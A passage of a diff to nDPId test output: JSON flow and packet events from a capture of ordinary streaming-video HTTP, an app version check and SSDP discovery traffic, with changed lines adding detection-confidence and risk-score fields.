-01263{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01289{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 01067{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1467353157475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"ts_msec":1467353157475,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDRAADMGDUtvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00985{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":457,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":457,"pkt_l4_len":423,"ts_msec":1467353157509,"pkt":"TF4M6gNlABxCjnAxCABFAAG7D3xAAIAGbLPAqHMI3xpqQsU+AFB482xgj\/e7VVAYAQRcuQAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQpSYW5nZTogYnl0ZXM9MzQyNDI1Ni04MDU3MDIzDQoNCg=="}
-01023{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}}
+01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7440000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1467353157533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353157533,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5zsFAADMGa3TKbA7swKhzCABQxT0x8BrOPOASCFAYACB8+QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 01067{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1467353157718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"ts_msec":1467353157718,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDVAADMGDUpvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1467353158696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353158696,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLHIAAAER1v7AqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"ts_msec":1467353159222,"pkt":"TF4M6gNlKDc3Alz6CABFAAE1+vRAAEAGNqjAqAUPROn9hf5nAFAhJnFt6cGPtIAYEBWfeAAAAQEICiYbloUrIzeaR0VUIC9jb21NYWdpY2FuQXBpL2luZGV4LnBocC9Ub29sQm94L3ZlcnNpb24gSFRUUC8xLjENCkhvc3Q6IGFwaS5tYWdpY2Fuc29mdC5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLXR3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1hZ2ljYW4gKHVua25vd24gdmVyc2lvbikgQ0ZOZXR3b3JrLzcyMC41LjcgRGFyd2luLzE0LjUuMCAoeDg2XzY0KQ0KDQo="}
-00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}}
 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1467353159428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"ts_msec":1467353159428,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4t91AADUGhHxE6f2FwKgFDwBQ\/mfpwY+0ISZyboAYABs\/NQAAAQEICisjOHomG5aFSFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6MjUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"}
 00948{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1467353159731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"ts_msec":1467353159731,"pkt":"TF4M6gNlABxCjnAxCABFAAGgFhZAAIAGZjTAqHMI3xpqQsU+AFB4823zkD5tZ1AYAQS6ZwAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2Y3JjP2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQoNCg=="}
 00964{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1467353159746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":443,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":443,"pkt_l4_len":409,"ts_msec":1467353159746,"pkt":"ABxCjnAxTF4M6gNlCABFAAGtzXdAADgG9sXfGmpCwKhzCABQxT6QPm1nePNva1AYACEkXQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkNvbnRlbnQtTGVuZ3RoOiA3Mg0KTGFzdC1Nb2RpZmllZDogU2F0LCAyNSBKdW4gMjAxNiAyMDo0Nzo0OCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI1NzZlZWRmNC00OCINCkV4cGlyZXM6IFNhdCwgMDEgSnVsIDIwMTcgMDY6MDU6NTkgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQoBAAAAjem7lGlyqIWJ0WZ4YikhMAAAAADA8HoAAAAAAJ0fBgCdHwYAAAAgAABAAACfagIAEAAAABkBmvdUqrt6QK4cKbQBDrk="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1467353160157,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1467353160157,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClHaUAAAER5dDAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1467353163154,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1467353163154,"pkt":"AQBef\/\/6bEAIlAI6CABFAACljZ0AAAERddjAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"ts_msec":1467353165300,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGfJAAIAG0FjAqHMIymwO7MU\/AFBSz4AccUHHfVAYQTf+XQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDcmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="}
-01263{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 